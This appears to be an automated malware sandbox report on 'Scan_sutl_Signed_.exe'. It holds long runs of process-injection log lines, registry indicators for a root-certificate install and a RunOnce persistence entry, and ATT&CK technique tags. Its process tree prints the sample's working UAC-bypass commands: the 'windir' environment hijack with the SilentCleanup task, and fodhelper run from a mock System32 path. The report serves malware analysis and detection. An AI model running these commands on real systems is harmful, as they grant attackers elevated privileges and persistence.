PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 1052	1140	Scan_sutl_Signed_.exe	26
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1052 wrote to memory of 2408	1052	TapiUnattend.exe	28
PID 1052 wrote to memory of 2408	1052	TapiUnattend.exe	28
PID 1052 wrote to memory of 2408	1052	TapiUnattend.exe	28
PID 1052 wrote to memory of 2408	1052	TapiUnattend.exe	28
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 1140 wrote to memory of 2380	1140	Scan_sutl_Signed_.exe	27
PID 2408 wrote to memory of 2468	2408	cmd.exe	30
PID 2408 wrote to memory of 2468	2408	cmd.exe	30
PID 2408 wrote to memory of 2468	2408	cmd.exe	30
PID 2408 wrote to memory of 2468	2408	cmd.exe	30
PID 2408 wrote to memory of 2484	2408	cmd.exe	31
PID 2408 wrote to memory of 2484	2408	cmd.exe	31
PID 2408 wrote to memory of 2484	2408	cmd.exe	31
PID 2408 wrote to memory of 2484	2408	cmd.exe	31
PID 2408 wrote to memory of 2496	2408	cmd.exe	32
PID 2408 wrote to memory of 2496	2408	cmd.exe	32
PID 2408 wrote to memory of 2496	2408	cmd.exe	32
PID 2408 wrote to memory of 2496	2408	cmd.exe	32
PID 2408 wrote to memory of 2516	2408	cmd.exe	33
PID 2408 wrote to memory of 2516	2408	cmd.exe	33
PID 2408 wrote to memory of 2516	2408	cmd.exe	33
PID 2408 wrote to memory of 2516	2408	cmd.exe	33
PID 1052 wrote to memory of 2632	1052	TapiUnattend.exe	36
PID 1052 wrote to memory of 2632	1052	TapiUnattend.exe	36
PID 1052 wrote to memory of 2632	1052	TapiUnattend.exe	36
PID 1052 wrote to memory of 2632	1052	TapiUnattend.exe	36

Executes dropped EXE 2 IoCs

pid	Process
2680	fodhelper.exe
2700	fodhelper.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
2468	reg.exe
2484	reg.exe
2516	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Scan_sutl_Signed_.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Scan_sutl_Signed_.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Scan_sutl_Signed_.exe

Adds Run entry to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Order_s = "C:\\Users\\Admin\\AppData\\Local\\Order_s\\Order_s.hta"	Scan_sutl_Signed_.exe

C:\Users\Admin\AppData\Local\Temp\Scan_sutl_Signed_.exe
"C:\Users\Admin\AppData\Local\Temp\Scan_sutl_Signed_.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies system certificate store
- Adds Run entry to start application
PID:1140
- C:\Windows\SysWOW64\TapiUnattend.exe
  "C:\Windows\System32\TapiUnattend.exe"
  2⤵
  PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\Users\Public\Natso.bat
    3⤵
    PID:2408
  - - C:\Windows\SysWOW64\reg.exe
      reg delete hkcu\Environment /v windir /f
      4⤵
      Modifies registry key
      PID:2468
  - - C:\Windows\SysWOW64\reg.exe
      reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
      4⤵
      Modifies registry key
      PID:2484
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\reg.exe
      reg delete hkcu\Environment /v windir /f
      4⤵
      Modifies registry key
      PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\Users\Public\Runex.bat
    3⤵
    PID:2632
  - - C:\Windows \System32\fodhelper.exe
      "C:\Windows \System32\fodhelper.exe"
      4⤵
      Executes dropped EXE
      PID:2680
  - - C:\Windows \System32\fodhelper.exe
      "C:\Windows \System32\fodhelper.exe"
      4⤵
      Executes dropped EXE
      PID:2700
- C:\Program Files (x86)\internet explorer\ieinstal.exe
  "C:\Program Files (x86)\internet explorer\ieinstal.exe"
  2⤵
  PID:2380

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1140-130-0x0000000010670000-0x00000000107C6000-memory.dmp

Filesize
1.3MB

Download
memory/1140-124-0x0000000010410000-0x0000000010450000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads